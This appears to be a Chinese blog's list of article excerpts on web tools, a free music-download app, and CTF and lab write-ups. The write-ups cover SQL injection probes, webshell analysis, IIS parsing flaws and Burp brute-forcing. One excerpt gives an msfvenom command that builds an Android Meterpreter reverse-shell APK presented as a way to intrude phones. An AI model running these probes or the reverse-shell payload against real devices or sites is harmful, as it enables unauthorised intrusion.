煎蛋网小程序 - 煎蛋网Pro分享

 煎蛋,地球上没有新鲜事。 煎蛋网正式推出微信小程序啦,一个是煎蛋Lite,另一个就是最近新出的煎蛋网Pro。 此举都是为了方便手机用户在手机上观看浏览煎蛋,此前开发的煎蛋网APP由 Daniel 开发,但是截至目前已停止更新 。于是正式推出煎蛋网小程序,而这次煎蛋网直接推出跨越安卓和 IOS...

2019-01-16 22:25:24

阅读数 159

评论数 1

AYNU音乐实验室简介

一、AYNU音乐实验室命名由来 AYNU是我的母校安阳师范学院的简写,为了纪念我的母校因此使用了AYNU这一命名方法。 二、AYNU音乐实验室建立目的 目的很单纯、很简单:为广大网友提供免费的音乐在线播放、下载服务。因为我们相信,音乐是没有国界的,音乐是不分贵贱高低的,音乐更应该是我们共享的...

2018-12-19 20:58:16

阅读数 841

评论数 0

AYNU音乐实验室-APP免费下载

AYNU音乐实验室 - 是一款免费的在线音乐播放器。 目前收录有网易云音乐、酷狗音乐、QQ音乐等主流平台的所有歌曲,全部可以在线免费下载。 最近网上一直有人找这款APP,我就直接放上来吧。 APP下载: 蓝奏云:https://www.lanzous.com/i1txmdi 百度云:ht...

2018-12-15 15:03:23

阅读数 1384

评论数 0

Sublime Text3下载、安装【安装版&免安装版】、汉化、中文插件

1.先在官网https://www.sublimetext.com/3下载安装包,这里分为安装版&免安装版,考虑到一些同学可能无法下载,我在这里放上安装包网盘链接,【portable version】是免安装版的,直接解压就可以使用了,个人比较喜欢这个。   2.安...

2018-09-15 17:24:52

阅读数 2362

评论数 0

WordPress同步文章到微信公众号

1.首先感谢@我爱水煮鱼大佬开发的微信机器人插件,确实很好用。 此插件分为高级版和免费版,一般来说免费版都够平常使用了,此次我以免费版为例来讲解此款插件。 2.安装好插件之后,在WordPress后台进行设置,分别填写你的APPID、secret、URL服务器地址(即域名,其实已经自动填写好了...

2018-09-12 17:23:56

阅读数 2685

评论数 0

网站信息查询、如何查找真实IP以及社工

1.查找网站真实IP地址,看看是否使用了CDN加速,以下两个网站是比较好用的,输入域名之后如果检测出来有多个IP地址,那么毫无疑问肯定是使用了CDN加速。 https://ping.aizhan.com/ http://ping.chinaz.com 或者使用Windows下的nslooku...

2018-08-11 10:41:21

阅读数 1632

评论数 1

Discuz在数据库中修改后台管理员密码、重置UCenter创始人密码、运营之增加创始人的方法

1.忘记管理员后台登录密码 在phpMyAdmin中找到pre_common_member表,然后找到管理员用户更改password字段,一定要写成MD5格式,比如:64d5c9b55f3bd8da20589ca606688c03这段MD5就是明文的admin,然后就可以用密码admin登陆了。...

2018-08-10 15:58:32

阅读数 3754

评论数 0

Bugku-网站被黑解题思路Writeup

1.这个题没技术含量但是实战中经常遇到,真没错,因为你发现的时候一般很多网站已经被搞过了。顺便说一句,黑页看着还可以,我曾经给我媳妇儿做过一个这样的相似的网页。 2.我先在后面加上了一个index.php来确定是否为PHP网页,确定是了之后,打开御剑扫描,发现了shell.php目录文件,打...

2018-08-08 16:49:18

阅读数 2670

评论数 0

墨者学院-WebShell代码分析溯源(第1题)

1.此题属于代码审计,先下载源码,利用扫描工具直接扫描吧 使用seay源代码审计系统扫一扫(实在不想一个个去看。。。) seay源代码审计系统:https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg 2.检测出来可疑代码片段,打开文件检查一下,这种其实...

2018-08-03 19:04:27

阅读数 363

评论数 1

墨者学院-内部文件上传系统漏洞分析溯源

1.打开之后就是一个上传页面,测试后发现是ASP的上传页面,先猜测大漏洞IIS下文件解析漏洞,这题主要考察怎么创建文件夹的。 例如:在test.asp文件夹下,里面的所有文件都将被看做asp文件执行,举例:123.jpg在test.asp文件夹下就会被看做123.jpg.asp来执行。 而且其...

2018-08-03 18:09:14

阅读数 732

评论数 0

SQL注入实战-MySQL-墨者学院

SQL注入实战-MySQL 今天我将用两种方法来讲解,第一种,SQLMap自动化跑数据库,第二种,利用火狐的hackbar来手工注入。 【第一种】 1.先看这个url:http://219.153.49.228:45709/show.php?id=MQo=,一般来说都是id=一个数字,这个M...

2018-07-07 19:43:27

阅读数 926

评论数 0

墨者学院-SQL手工注入漏洞测试(Access数据库)

IP地址 : 219.153.49.228 端口 : 44402 协议 : http 1. 2.利用and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果...

2018-07-04 10:20:20

阅读数 1329

评论数 1

BugKu - sql注入2

这道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结) 解这一道题的时候我先想的是御剑跑一下目录,无果,然后经大佬提醒是属于DS_Store源码泄露,然后就需要用到python脚本来跑一下了,发现了flag目录,直接访问,然后就得到了flag。 DS_St...

2018-06-22 21:56:20

阅读数 1645

评论数 0

BugkuCTF练习-成绩单

1.先测试正常数据,用火狐的hackbar插件post请求

2018-06-12 16:29:26

阅读数 3261

评论数 0

输入密码查看flag-Bugku

这里提示是5位数字密码,我们首先想到的就是用burp暴力破解,位数不多,而且是纯数字,可以试试的先打开火狐浏览器的代理服务然后打开burp的代理功能,需要和火狐上面设置的一样然后开启代理在浏览器里面随便输入五位数字然后这里我们可以看到burp已经抓取到刚才输入的数据了然后全选然后在Position...

2018-05-25 13:43:38

阅读数 4386

评论数 0

使用Kali生成木马入侵安卓手机

先看Kali的ip,我的是192.168.0.101然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk这里的5555是设置的端口,也可以自...

2018-05-24 22:13:27

阅读数 31951

评论数 59

提示
确定要删除当前文章?
取消 删除
关闭
关闭